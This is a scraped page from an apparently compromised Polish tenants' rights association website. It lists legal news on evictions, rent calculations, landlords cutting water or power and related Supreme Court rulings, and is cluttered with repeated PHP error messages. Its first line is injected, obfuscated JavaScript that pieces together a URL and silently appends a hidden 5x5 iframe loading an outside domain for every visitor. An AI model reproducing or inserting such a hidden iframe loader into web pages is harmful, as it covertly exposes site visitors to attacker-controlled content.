jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at);
Strict Standards: Declaration of JCacheControllerPage::store() should be compatible with JCacheController::store($data, $id, $group = NULL) in /virtual/l/o/lokatorzy.ugu.pl/libraries/joomla/cache/controller/page.php on line 199
PRAWO

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Niechcianemu lokatorowi można bezkarnie rozebrać dach.

Przez budzące wątpliwości sformułowanie zawarte w Kodeksie karnym nowi właścicieli kamienic, którzy chcą się pozbyć dotychczasowych lokatorów mogą bezkarnie zalewać ich mieszkania, wyłączać prąd, demontować dach, a nawet uszkadzać kanalizację. Więcej informacji


Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Korzystne dla żyjących na kocią łapę – również związków jednopłciowych.

Czy wskazana w art. 691 § 1 k.c. przesłanka faktycznego wspólnego pożycia, rozumiana jako więź
łącząca dwie osoby pozostające w takich relacjach jak małżonkowie, dotyczy także osób pozostających
w nieformalnych związkach partnerskich z osobami tej samej płci? Więcej informacji

 

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Kalkulacja podwyżki czynszu ma być dokładna

Sąd Najwyższy w uchwale z 5 lutego 2010 r. (sygn. akt III CZP 130/09) uznał, że w kalkulacji podwyżki powinien być wskazany sposób obliczenia tego ze składników czynszu, który stanowi podstawę wypowiedzenia dotychczasowej jego wysokości.Więcej informacji

 
 

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Od dłuższego czasu pani Wanda boryka się z problemami finansowymi i zalega z płatnościami za lokal. Mieszka w prywatnej kamienicy i właściciel budynku zagroził, że w razie dalszego niepłacenia i nieuregulowania opłat z poprzednich miesięcy odetnie dostawy wody do jej mieszkania.– Czy właściciel kamienicy ma takie uprawnienia – pyta czytelniczka.Więcej informacji

 

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Czy w przypadku wydania przez Sąd orzeczenia o nakazaniu opróżnienia lokalu socjalnego -na podstawie art. 14 ust. 1 ustawy z dnia 21 czerwca 2001 r. o ochronie praw lokatorów, mieszkaniowymzasobie gminy i o zmianie Kodeksu cywilnego (tj. Dz.U. z 2005 r. , Nr 31, poz. 266 ze zm.) - istnieje obowiązek orzekania o uprawnieniu do otrzymania lokalu socjalnego bądź o braku takiego uprawnienia wobec osób, których nakaz dotyczy? Więcej informacji

 
 

Strict Standards: Only variables should be assigned by reference in /virtual/l/o/lokatorzy.ugu.pl/templates/szablon13/functions.php on line 444

Zanim sąd orzeknie płacisz odszkodowanie zamiast czynszu

Osoby uprawnione do lokalu socjalnego, o których mowa w art. 18 ust. 3 ustawy z 21.6.2001 r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego (t. jedn.: Dz.U. z 2005 r., Nr 31, poz. 266 ze zm.; dalej jako: OchrLokU), w okresie od wygaśnięcia stosunku najmu do uprawomocnienia się wyroku eksmisyjnego opłacają odszkodowanie według zasad określonych w art. 18 ust. 1 i 2 OchrLokU –wynika z uchwały Sądu Najwyższego.

Uchwała SN z 6.12.2012 r., III CZP 72/12

 
 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.